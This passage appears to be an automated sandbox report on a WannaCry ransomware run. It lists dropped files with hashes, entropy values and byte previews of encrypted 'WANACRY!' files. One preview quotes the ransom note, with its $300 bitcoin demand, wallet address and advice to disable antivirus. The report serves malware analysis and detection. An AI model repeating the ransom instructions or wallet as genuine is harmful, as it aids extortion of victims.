                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 4 05:43:20 2024, mtime=Fri Oct 4 05:43:20 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):577
                                                                              Entropy (8bit):5.1553023194242416
                                                                              Encrypted:false
                                                                              SSDEEP:12:81ypzYNbVUthZsUoBjAuvUuHwoOXhicmV:81BImAO96Fm
                                                                              MD5:9B3A32817BC73D079076C7A433BFD223
                                                                              SHA1:ECB0EAF1C2D33A065EAD7E1CC26B1293BB2BC7A7
                                                                              SHA-256:12F9DBE08D1AA086B674A0CFFAD10F11FDC79664CBF5139B9B609D05197228B5
                                                                              SHA-512:CD59012398BA9D25D19F76689222451A32A13D1A79CFEB7B58ED152F121A180CC3A10283ECB32922DA99F162972E0D50CF1C28061D35A11130DFE82B4EAE5702
                                                                              Malicious:false
                                                                              Preview:L..................F.... ......(...c4.(....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......}}.9....7.(....&..(.....t.2......J.2 .@WANAD~1.EXE..X......DYk5DYk5..............................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........s3.T.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......066656...........hT..CrF.f4... .F..F...../....%..hT..CrF.f4... .F..F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.809567114610138
                                                                              Encrypted:false
                                                                              SSDEEP:24:lfiNLy6KnPpogtmk1Na647Jl39K51lpKx8drH7:BwO6qP2oRgld9IpD
                                                                              MD5:8231F46AA554597C066E2EE155D1CF12
                                                                              SHA1:63F83E9F2A9AF758EC9335771B8AE80C4C19A6F6
                                                                              SHA-256:C0162D5294B68809CD54ED27869B7980AA1F459003697176B4172F0651D7F645
                                                                              SHA-512:A4EB2E5C44A76CD0FC3FCC5D43E5318FA2BDB021AB5C08E898762223798E422C48FDBCFE4CAAF1AFA8D33B7CEA4F05576EBC107E7D9FC90FC322E2A8A6459D99
                                                                              Malicious:false
                                                                              Preview:%%....&_.}%1.q.R.\......{..1..O..q.`^...Bm...:Uz...y+...._......i."C.{.Z.L[."......L..R.....(s.....<.g>1-..v....K.{wk.1F ....Dsv....q_du{a......t.r..B<...$...SM...s.....(.L...#`<..0...y...Wnp.yg0;-...L]....s|.s.r.6b.hO.....|o.........j^F......2...,=h..s.%{..5....^J/v..;...k&.......OM,.&.D. ...Z.Z<R.W...C....6fT..F8R.h/.<.0T...m.?...h...i-......9..c...........4.X..I.Q..RB..mi..o..3...A.PM"[..n.<.y...J...R.....WM..G..,...H.s7....>E..........O...X@.&.\r.8."j....*GX}}..j.D..ZJ.^m...A..t.L..7_1p.-sN:...'}x...5...[.9..o.3..W.....).._..........<b....h.....n.?v=.|....Y .~6@.......x....}..u.y...pG'..%.z,..8..S@0\=@Y.9.:..V[aO....EG....'u!.0.K./.V_{.yw..G.k.Sn.C.c..9."..I.!.....O..D...eU...X...I#...e...rR....Amy[_5.Z....QT........k....G RU....$o........e..\}I0b.I..W......,...L.2W..l,.&M,...;a4....yx.A..g..Tm...._.D...Q@........cCD...W...f.Zm.uSc....VV.z.(...3.W..'M."\.'.t.7.4.Z......{...>L..p......U!........g.....'..f..E.....5aB
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.824155855836843
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkQzy0O93myGh57PCNZOZ0Vzl6aAqvEOBHdeBM7HWWVMXr4DCmOFc:bkKkPIzO20V8OvnDea7EFHc
                                                                              MD5:95BB38B3D51160677A6B44008F1AAFB8
                                                                              SHA1:80606A05F3CBD41AA1F1094D63855CFCCBC9469E
                                                                              SHA-256:D992822092212B9C6BF23B5E7BF5E76E91D011424B4C70BB7AA7B1E460BB56AC
                                                                              SHA-512:EEAA084FFA1146BD01DBF624D1B3C8C6A3C57060BC20D899DB270A978FBD3555351DE801C120C51E68373BC1FB5911A11C7FABF4828B6461BA077D1BE2EA2CCC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g..5?,..!.b)J,...M.P....@...ob.c.>..#.%KL...0...:<v.....R".=...O.Y.0.Ma.......m .S/..2+.*..S...Z.S."8..q.......cE`z..q.../.yg...$`...J...\BnN ..bmSA...:.qpS>..>c{...u...........3b}z....a.+.....X..{'..v.......k...@x.s*K....y.......1...Y....k............RW!9Tnn.......I...}.qq....yK..M\.....[BQ.C.-r..9vD...-P.....yX...{...a..$.r.NV.....y...........\e.s...{@..Q..+/]Z.,Zm.._.n......&.P.`...J.R.a...`[WU.%..W.q.....i.L~s..e.i..........u..>a.........H1...$.....{....H....=&.p.BG..y..:.|.'....A.1....G.......';k....m(..D^..`..g..YS.!.3.OQ....... .8.......[.Y.]G..{g,.B...pe.h...#....,....q..Ssa.z..$...J...........|wos....W.."...(].....M.&.X.0s.[*...:K...`..."(AK...b.\.C.9.F.=.:.G7\.9..+Ly...+.5.....I.%......*.. 0...#8.?....t..FD.....'MJ..$./L=.)..@...xFpF.C.0.m..l.Vg..9..%./..N.~.8..&.........:...9.f=FPe..........q.....z@...MQ..e.......oR....../..3.O..C?Q..h..[.%....a....7.....+.m..8 ..@....+.....+|...J...2..]..2..}.....%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.824155855836843
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkQzy0O93myGh57PCNZOZ0Vzl6aAqvEOBHdeBM7HWWVMXr4DCmOFc:bkKkPIzO20V8OvnDea7EFHc
                                                                              MD5:95BB38B3D51160677A6B44008F1AAFB8
                                                                              SHA1:80606A05F3CBD41AA1F1094D63855CFCCBC9469E
                                                                              SHA-256:D992822092212B9C6BF23B5E7BF5E76E91D011424B4C70BB7AA7B1E460BB56AC
                                                                              SHA-512:EEAA084FFA1146BD01DBF624D1B3C8C6A3C57060BC20D899DB270A978FBD3555351DE801C120C51E68373BC1FB5911A11C7FABF4828B6461BA077D1BE2EA2CCC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....g..5?,..!.b)J,...M.P....@...ob.c.>..#.%KL...0...:<v.....R".=...O.Y.0.Ma.......m .S/..2+.*..S...Z.S."8..q.......cE`z..q.../.yg...$`...J...\BnN ..bmSA...:.qpS>..>c{...u...........3b}z....a.+.....X..{'..v.......k...@x.s*K....y.......1...Y....k............RW!9Tnn.......I...}.qq....yK..M\.....[BQ.C.-r..9vD...-P.....yX...{...a..$.r.NV.....y...........\e.s...{@..Q..+/]Z.,Zm.._.n......&.P.`...J.R.a...`[WU.%..W.q.....i.L~s..e.i..........u..>a.........H1...$.....{....H....=&.p.BG..y..:.|.'....A.1....G.......';k....m(..D^..`..g..YS.!.3.OQ....... .8.......[.Y.]G..{g,.B...pe.h...#....,....q..Ssa.z..$...J...........|wos....W.."...(].....M.&.X.0s.[*...:K...`..."(AK...b.\.C.9.F.=.:.G7\.9..+Ly...+.5.....I.%......*.. 0...#8.?....t..FD.....'MJ..$./L=.)..@...xFpF.C.0.m..l.Vg..9..%./..N.~.8..&.........:...9.f=FPe..........q.....z@...MQ..e.......oR....../..3.O..C?Q..h..[.%....a....7.....+.m..8 ..@....+.....+|...J...2..]..2..}.....%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.843665139243041
                                                                              Encrypted:false
                                                                              SSDEEP:24:gCeDePA+rFbV+22cDvGlxTuL+OzVHWKDJoPy1TA42cYLG1:gCyePAYA22cDvITkzkcNKc0W
                                                                              MD5:6CC2D7B6424A85890DEE8FA771B4B782
                                                                              SHA1:565540F85ECAF2A54505A1F7257E689C3F1563F4
                                                                              SHA-256:BDEB94B8A449A138A1E25166E69D2D456BF815F8E93681BBCEA54B77B52C090E
                                                                              SHA-512:539E83D34B04D79E60E75D2F083E0476A1BB25604BAD51B17970A76A91D9118C386A36FD5EA623A8D4728AB998EA54408E673FD3C75DAB69B21AF1196A1CA152
                                                                              Malicious:false
                                                                              Preview:...V/.O.jOx-.%.T`G..b....1...'(u...Q....[..2E.4.i.......T.)..7...._.se..E..=.....SR..=.\;.B.Ug......... 0....j.YWu.Y.....B..k.....D.#A.rF.......8.`..._.n..Z.....sP.7.P...:...@.Zt.C^$.E...o.c....9e._(...57..y..;...........1.`/..S.H".BY.^..?A.....O.....X..p.... 0f_..S...fe;..=.,2..=....][....$.j2G.9/.v.Z.L%.t..M0..u.`p*..p+.>..Y!....>...*v.]...w'.a.X.K...s.:....G..~>v........l)Pc.......}...8.....}.1}...Xk....e......k.n...Pd..}G.....R`...)..AGg~.h....`.v.3%.(.+..G.u1g_BS.]i..~8P..\`.h..pg.S...s'.w..c.h5!..].7q..G6..(d....].c..j.........S.....aI...B..B..:.+6q.>..-...S..bH3X.b$""..<.T.`...6...3.........Z...vX.....jC.h.gP..Zw}EFA.JS........X#...,...k../C.O..V.xL.. ..Y..m.&...7..n..z.V................J..Ox.@..g..qK.I$i"..3.=.k.IxC.......x9..."...u.F....5.IrO....ED.8+./.G.g...N)tf.|.q..p~...,.....l..\).....&*..g...\E-u......d2.....S%.l1Y.}U%...]....$.&e.%5=.k-`..M.A%...i..W..f.|....({}!...._<.E+.w.ZW.G..o.........V+......901...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847603348002397
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3PQPct1RsV+VKl78fouhqJGsD0BOhstxkCXoyn5ZqjSHVbRaXTXrT:bkIPC4+VK8fouU0TxkCPTRIXL/
                                                                              MD5:A0BCE65F07501E8C957A4E78F67DE533
                                                                              SHA1:E8ECBB6860F5DBFB2625AA5873547D465F3622B6
                                                                              SHA-256:0F5B86EAD0DC3E8FDE63C1016911ED229DA78E1C8A375D5FE7AFF6097ECF2027
                                                                              SHA-512:0A6C0F890FA7CB8F4C65D7BFDFAE734FCDAB3FD037DDAF4D62ACE75451FE88DF2E0BC7B8A04DCB8C5255849BBB0E467B819D8AEE9CD8C2EBEFB7818105D3A2DE
                                                                              Malicious:false
                                                                              Preview:WANACRY!....WM5..$...EK....&n...'..`2...I..'D...&....c8.{{.....i.r.(3.y.f.u1......k.-......{F..t2.PVF ..H....O.+......A&.%?.@...B.lzM...vr;>.B...B..:...$*..oI...k...se#p.....b=...a.p..F..'..G.)@.....4s6..D.n.LS..9S...%.by:....EFi.NT.A..s.{...s.Y.e..z..uoN............C.O._.m..o......E(..25CN...|cp..a..o..m.....`.{.m%7.%...l.e...c.)A......n(S..^.I.,......H...L#.GFq.4....\....E.!nK\...7[...R.._S&4.d...RX..D..0YXm.u0....:vpn.....5........zQ.fd..>M......^$.".C.l...?..G.9...po...u.[..-.M..+e..F....U....Q>.)D.....R..6.h.,...a.%...F....C.....Vm.....{K:..._[.8..G.#.zL..,.....~.E.'..xO?.-...4.{...F3.f.P.}....@.....5i....T.@...,...?.......ZG..<.[.k.8.b.7...N....(+.+hF.u......!....K..VS....R..q......R.U.3.R(.W..7@...8<....@.......U!..s(.S.P.f.3.(..?......G1.F...q{R..8...(..O.J*U.s.QG....-.B<..._..Lh...q.oK.......Z......!P.u....A.ps2.s.E.[..Ke.. .......e....L.z).u.Z.Q.].GUK.cb3.[...Z.....X^......]....Kc. .w.@...~q........ .3....Bh...!..:_..1...U....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847603348002397
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3PQPct1RsV+VKl78fouhqJGsD0BOhstxkCXoyn5ZqjSHVbRaXTXrT:bkIPC4+VK8fouU0TxkCPTRIXL/
                                                                              MD5:A0BCE65F07501E8C957A4E78F67DE533
                                                                              SHA1:E8ECBB6860F5DBFB2625AA5873547D465F3622B6
                                                                              SHA-256:0F5B86EAD0DC3E8FDE63C1016911ED229DA78E1C8A375D5FE7AFF6097ECF2027
                                                                              SHA-512:0A6C0F890FA7CB8F4C65D7BFDFAE734FCDAB3FD037DDAF4D62ACE75451FE88DF2E0BC7B8A04DCB8C5255849BBB0E467B819D8AEE9CD8C2EBEFB7818105D3A2DE
                                                                              Malicious:false
                                                                              Preview:WANACRY!....WM5..$...EK....&n...'..`2...I..'D...&....c8.{{.....i.r.(3.y.f.u1......k.-......{F..t2.PVF ..H....O.+......A&.%?.@...B.lzM...vr;>.B...B..:...$*..oI...k...se#p.....b=...a.p..F..'..G.)@.....4s6..D.n.LS..9S...%.by:....EFi.NT.A..s.{...s.Y.e..z..uoN............C.O._.m..o......E(..25CN...|cp..a..o..m.....`.{.m%7.%...l.e...c.)A......n(S..^.I.,......H...L#.GFq.4....\....E.!nK\...7[...R.._S&4.d...RX..D..0YXm.u0....:vpn.....5........zQ.fd..>M......^$.".C.l...?..G.9...po...u.[..-.M..+e..F....U....Q>.)D.....R..6.h.,...a.%...F....C.....Vm.....{K:..._[.8..G.#.zL..,.....~.E.'..xO?.-...4.{...F3.f.P.}....@.....5i....T.@...,...?.......ZG..<.[.k.8.b.7...N....(+.+hF.u......!....K..VS....R..q......R.U.3.R(.W..7@...8<....@.......U!..s(.S.P.f.3.(..?......G1.F...q{R..8...(..O.J*U.s.QG....-.B<..._..Lh...q.oK.......Z......!P.u....A.ps2.s.E.[..Ke.. .......e....L.z).u.Z.Q.].GUK.cb3.[...Z.....X^......]....Kc. .w.@...~q........ .3....Bh...!..:_..1...U....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.815501663136476
                                                                              Encrypted:false
                                                                              SSDEEP:24:v9dCCb8xNQOfWgPtS9KQNfw1vkt7YNFE3iMWhWv8YgYFc6u/G:v9/oLQO+gPtS9KQFIYgYFcrG
                                                                              MD5:C8D1FABBF416B8B274EF8099E7F638B2
                                                                              SHA1:E2B883B0BCEA9E14B41A9E3793A289A5748F26B4
                                                                              SHA-256:F3F1F230361D22249AAAF0597ABDFB79AB4F5999C35528C900BC5D6B2EF0B645
                                                                              SHA-512:F4793552713E7B839FA54A2CEE0B7A6C39B0973086D91120176153172B3E7E69D25CDF68D6FF12E99D191E8DB19D6898787B101AB7AA2F49D21F23A14CDBD32E
                                                                              Malicious:false
                                                                              Preview:..8O....gJ.....w...%..5..s......B../.+lf.....(3.M2..+.6.[...!...@@.}...'.]..&V"..i`..x..y.Y.B.>".......W...Y..F5.\...W....}\.E"(.N@..S..7.GI&.'S....`o..t?Pl!.nv..zp.$*.@..6.E1...+K&t.........O...A;.J?....y.U..8....k...@V....Oxg...<Q.I..>...w...?.p.I.. J...)..1......g..9.Ku~%P.v.v...........&$3..=...._V..1.......8?qd.^.*.cD{;I.A.b^..K.N...7 .n..H....v$...=.:8^.a.b........7....."bh.%%3.v.!.X..a=v.f.....O..T......_..7<T'.....i..Xz.....t0Q'2..<..%.q.)...p.!a=D.r._./G>..!&_yB.h...Q...d:C...f...F....{.].ee..... YF.b.mf.....2.f.V....(.<.g>.......xq.ji.ejF..{.........D....V2.....K%Vj..UO...8.f....lL.[.W..d......iL..g...qGPE.vx.l...k.0-...&...i.i"/Z......|>....N...S]..jF.6(L..Z./..l.h...I.z(..c..).{J.V.}37.Fiy.Fi.q.AE...8......k........TN....t...w.......Y0.`'.lW..*4.....[..Hj....*rTp..V.H.6W{..Y......t....tx.mAL..".H.2.h......I.Ug72../..9"./..N...M*.z..;.._....}.$...G..J...I...._.Y.q...&......3.,....JQ..&T.)...^._?....{.&.{.?..rsr..............q..o.e{.5
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859640011475139
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWwGYjfvRGXpriM6jefLj4FSxWkN1uFDvgvh4NXxy+DvjtdXM:bkzk5JrLEFSgkN1cshYjfc
                                                                              MD5:3B8991C07018842FACBAABF53A051E7E
                                                                              SHA1:FBC3D543D69E9D1D2BA2038811E3DD75854740FF
                                                                              SHA-256:8C18A5C2D779E87D9F191846ACF4ECF2A99E7DC01A79BE62C7E53142E1E9042A
                                                                              SHA-512:65737D06B321F676F0A8C2FFAC09B6DD34946ECFC3B918782422105CAA56013BDD55D9CEB13C30D9A9EABB9B6D25CE621F11AA61C70EF84E19B877512A17EADB
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............7'T..`....[...W..C.b=.....|*."..gwmB....2...h.<Go.......4.t....T.>._./....[p..v.......?s.hr.p.....H.R....j..$.{..b.6=.-..P..zI.....1.Q#.........e(...w?6.....(.w...~s...$]vR...#..}.[.?.K..1....l.v...DL?.....X..K...<A@.F....C9...............#3m..O4...p....c|Y|..6........."....+M.o...c.m....DC...j.t;..i.&T........Y.e..6..AWaIt....ZD..l..g.n..Ej;S..R..G!9->..W}..HE\wr+.i.....B..x....l.#..~.T..v..]nS......)..g.I.;V...........V$.JqO....P*.Y~....3...m....A..../.%.....A....^...3.;,XP.{~^F..AP.....CYu.*}..............qy.....L4........8.u.i.A.P.wjlvw.w.<y.Y.5Y9.2ap.q.)......rV...A..C<.z..l=..%.;.zO.......ns...f..X8.K....&..xK.>.L.B6...xQ..K..L..1.0...;....5s.6EN.f& .*.c......s..NO.O...Xb.........S...UCTW..)d..@..0.}G.$...?.........=.s.."~......t,....d@..O..a..u(._nG..6.r.[.,..EI.~.=_..].U.o....^9..d-)5..`P..'......M.0>.}.%2F+..yB...1..S.`1..E.....)h...R....-#K...*..l..h9.....4..s.eD.4c."HT...j.t'...[.e....p|..q.&.`.P.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859640011475139
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWwGYjfvRGXpriM6jefLj4FSxWkN1uFDvgvh4NXxy+DvjtdXM:bkzk5JrLEFSgkN1cshYjfc
                                                                              MD5:3B8991C07018842FACBAABF53A051E7E
                                                                              SHA1:FBC3D543D69E9D1D2BA2038811E3DD75854740FF
                                                                              SHA-256:8C18A5C2D779E87D9F191846ACF4ECF2A99E7DC01A79BE62C7E53142E1E9042A
                                                                              SHA-512:65737D06B321F676F0A8C2FFAC09B6DD34946ECFC3B918782422105CAA56013BDD55D9CEB13C30D9A9EABB9B6D25CE621F11AA61C70EF84E19B877512A17EADB
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............7'T..`....[...W..C.b=.....|*."..gwmB....2...h.<Go.......4.t....T.>._./....[p..v.......?s.hr.p.....H.R....j..$.{..b.6=.-..P..zI.....1.Q#.........e(...w?6.....(.w...~s...$]vR...#..}.[.?.K..1....l.v...DL?.....X..K...<A@.F....C9...............#3m..O4...p....c|Y|..6........."....+M.o...c.m....DC...j.t;..i.&T........Y.e..6..AWaIt....ZD..l..g.n..Ej;S..R..G!9->..W}..HE\wr+.i.....B..x....l.#..~.T..v..]nS......)..g.I.;V...........V$.JqO....P*.Y~....3...m....A..../.%.....A....^...3.;,XP.{~^F..AP.....CYu.*}..............qy.....L4........8.u.i.A.P.wjlvw.w.<y.Y.5Y9.2ap.q.)......rV...A..C<.z..l=..%.;.zO.......ns...f..X8.K....&..xK.>.L.B6...xQ..K..L..1.0...;....5s.6EN.f& .*.c......s..NO.O...Xb.........S...UCTW..)d..@..0.}G.$...?.........=.s.."~......t,....d@..O..a..u(._nG..6.r.[.,..EI.~.=_..].U.o....^9..d-)5..`P..'......M.0>.}.%2F+..yB...1..S.`1..E.....)h...R....-#K...*..l..h9.....4..s.eD.4c."HT...j.t'...[.e....p|..q.&.`.P.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8030495250447744
                                                                              Encrypted:false
                                                                              SSDEEP:24:KF14A0RC0vP93BChU2F5DtmpC7cX0MJRknlcJqkjHzK:zAqCy9SU6PmpkcX0znIzm
                                                                              MD5:5653231EBF361CC7958721913D4094C9
                                                                              SHA1:F0022A01EE4B26219C626C1D74A55D3012BAAE93
                                                                              SHA-256:7387925193F2A9EC1F054FCF62679A56DC790D4C288DFFE36CF94A94C30B2C5E
                                                                              SHA-512:A68CE1DDD2BF0D708029C6447996A096D2D4483110F1E995ABF4FE554B60BDD40A5B10A583701C4CAAF26D0C18C063F2B596E6269462924FC32A409DC7FA619F
                                                                              Malicious:false
                                                                              Preview:.7jIO..N..........3....R.6..X..8..N...xf....U..+sb.nyQ.?L..`.C...............pU.gs0..(..:o`..XPk.spK.tE..T.&.&f.p:.t.8..an.wp...?..)5.... .Vz#..dl=...M..gExz...g&&...F.{.).N...|.b.....H....k....q..&M*...v..d.E.5.A......@o.E..SWy..9GS...1Z.!p..].@x6.RK.q@..96?.......;.~.9.\..M..$\...LHt.#.1y.!T@...jJ.@.w....q..z.z....`....P.}.jXpa...K........Pz..]..7..*.../..r.2.O....!...P.Qt..3......t.|.eU.........}..^.au.*............kdt?..a$..y....8.a....v...U8.u..VY.k.Q.mT..3K(.^8...e.&S.p...... 3..XNY.u.z..X......W.<<K.~1.~........-..^.]...)zg...(pG..|nd|..>......Sb'..yYT.Z=..d...&.......T2.!..QP....|-(.L..y12lf.....r...k.ds.K...Ah1I.dtw.&|......?.0..%.@ .E..L....F..... T..y.../uX...lw..........Q...e.[.RC9.....$.@#vL.!.....z.>.....C.....^.=...........v..S.*....$.N."P2#CrUeQ.D~.P...h`.....>..D...G.n.r2]....r.b..t5.i...#|.J.....7...%?........>........k..T..........J._..Y:.........=u.......j...:.`..k=...|...@.8kY....'.....H...N..BV.i...?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839510051922561
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3L1Wg+42tY/HhlJDhfBsQ47DaM2srBvUmWyj:bk3Blca/Hhzzk2srvWyj
                                                                              MD5:9B59FDD093F06FDF0F2C5A6331BBF0CC
                                                                              SHA1:015E4969C0EEC02DFDFAE21149077A57A5FE74BA
                                                                              SHA-256:A7F1E92B018FCE571D8366C440052D4D008C1A4048BC45C16330098224E701D6
                                                                              SHA-512:579CBF0FF17709B7CCC8C001B68FEDC96CE012324F431196644D4C1A4EDCC8DFAE977BD7E7BF28B9683526E9AD2EBDB84391F2269CA1BE372E715B8108B3A57C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H....-@D.V]j.*eZ.@..@.q......^m...[.A......8_.+...Sr..;..4s=./3.3.7...~:X....{n....."..{.{* .C3..C.....6.H.1Kk/[...C>J_N....`....1<.......>oJ]..x9.e...i.$7Mj..l..B..^R......+C.7|6.6...7 ....tu..K...........6v..m.-r....t...I.....t.-g..&dT3@..`.............Y..%k....{..>J.Mx~.X...o*...M.f.......?Q1....A3.bVy$ v..bc..}M..\..8n.4.?.u....|....O$m..z...g6...%.[.:....l.]....w(........I+.......s.:k....}.Vq.... cBM...E...Y. <w:D".6...k.q..7..gt.............h......Z...^gz;..F.v..TE..PP.y.b.....)......!....W.........9..x..}p3Ck.....T....]p...D...W.....{.G.a4w.r.H.G...G......q..(:=...O..[.n....b....S....S..S...+......q.....~..j...r....b..p..H.Qp5:....&...:............. .K{o..........8v....B.Pi....B.C...;.B.\F..!......@._.9........=..d4.@.)..xg..<{J..&z^h.a...?.6(...q.{.pro*.}..3|../.."g.....j.$1...P.l}..r.e$...-...U._.Aj...Q......p7R......b....9..3....F..r.O.q.&.@&.j.).jGGg..x\.T2..I.7.)/.15..i.j..]./JS..7....RA..<k.....t.1..O$2.!..g..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839510051922561
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3L1Wg+42tY/HhlJDhfBsQ47DaM2srBvUmWyj:bk3Blca/Hhzzk2srvWyj
                                                                              MD5:9B59FDD093F06FDF0F2C5A6331BBF0CC
                                                                              SHA1:015E4969C0EEC02DFDFAE21149077A57A5FE74BA
                                                                              SHA-256:A7F1E92B018FCE571D8366C440052D4D008C1A4048BC45C16330098224E701D6
                                                                              SHA-512:579CBF0FF17709B7CCC8C001B68FEDC96CE012324F431196644D4C1A4EDCC8DFAE977BD7E7BF28B9683526E9AD2EBDB84391F2269CA1BE372E715B8108B3A57C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H....-@D.V]j.*eZ.@..@.q......^m...[.A......8_.+...Sr..;..4s=./3.3.7...~:X....{n....."..{.{* .C3..C.....6.H.1Kk/[...C>J_N....`....1<.......>oJ]..x9.e...i.$7Mj..l..B..^R......+C.7|6.6...7 ....tu..K...........6v..m.-r....t...I.....t.-g..&dT3@..`.............Y..%k....{..>J.Mx~.X...o*...M.f.......?Q1....A3.bVy$ v..bc..}M..\..8n.4.?.u....|....O$m..z...g6...%.[.:....l.]....w(........I+.......s.:k....}.Vq.... cBM...E...Y. <w:D".6...k.q..7..gt.............h......Z...^gz;..F.v..TE..PP.y.b.....)......!....W.........9..x..}p3Ck.....T....]p...D...W.....{.G.a4w.r.H.G...G......q..(:=...O..[.n....b....S....S..S...+......q.....~..j...r....b..p..H.Qp5:....&...:............. .K{o..........8v....B.Pi....B.C...;.B.\F..!......@._.9........=..d4.@.)..xg..<{J..&z^h.a...?.6(...q.{.pro*.}..3|../.."g.....j.$1...P.l}..r.e$...-...U._.Aj...Q......p7R......b....9..3....F..r.O.q.&.@&.j.).jGGg..x\.T2..I.7.)/.15..i.j..]./JS..7....RA..<k.....t.1..O$2.!..g..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.791112185156158
                                                                              Encrypted:false
                                                                              SSDEEP:24:FYQHrIyZe0Exb4jheTa0l/JC/TP4KkxMiaOpP6FOXLQ:Fb8yZe0ER4jheTaO/wTPt158ds
                                                                              MD5:854A7346BE61C86974DE703C53D34B34
                                                                              SHA1:827BD33E8D7D420CA0C076190775BD31F1E944AC
                                                                              SHA-256:3DC6CAA9D47FA778C23CEE9523A7B5D962CAE0AC4B2FFD939C2690A110F3FFE6
                                                                              SHA-512:1665E9F863E985A9CB20E9D21FA7F21490C99A38460D75627BB4FF35E545C31B13F06A5CAA06CFCE70B1D292659C4D2F30819702DE53ADE017667F4E51E900AA
                                                                              Malicious:false
                                                                              Preview:...v<..k..w.9.>...m...ss..M.5$..FGXIj.3X....-..! .;.......W_.>QD.8-.2..L.E.rD..L9l.q./Pzb^....'...a.#UM..>..7....^V.NG...P....z[.,.rM.9.k..4{..:.G|.`"..u..I..........a'...v..bZP....2..Y`..80.<....k.R...D9s.y..$".(a.uig....,6.0..........S..Y...Q.^|.s..X.1.%NYK1.A.4.b.o..5~)M.....13.1.L..B.g.K.dmeN.1&{..TF.w.>X>[RCb.g.y....CD.Yb.)$..!.u.|..M.....s0V1..U.K.v3o.....O.......K6..C...r.>.....^.CR..Ko..G.C.....S.p..........m|Y..pO..3FgHNKn...H.L%z........\....A...........x..x%.^..1.). ...F=cbW....IQ.Ra..S?7..|..;..T.)...nQ.{u.n.K2.6.Q_3..%-....(C.P-..=...kQ...?.gD...N|,S....E_...8...J.....g.g.............o6....f.H.U..q..2...6f\q....'...e....C,...x }.VQ....iC-....x>......j.u..h......J.tF.....i*.e........5......j...MY)..6.Wx...6.AZ.9.w...rMh.v"+.'....F.K..q,zU.W.n..2...[&......QI......3....|...H..N...c.D.N..dsQ.i`X..<.X6.$.}".0...U^.6........"...'...?O..H...@.Vd....}.......m.. j3.].).................C_.|..,...{.%....7&QK....i./1..Y.j..`$PrW
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852693470687874
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9SmndOQ/vunWYDRbTEskMANbWC16J8r1VmjuwH/e8UFY1XsrqBNz:bkkmndOQnoWYcsk9bWx8ap5eyT
                                                                              MD5:2D89B0E31872C45378863F34F6610D39
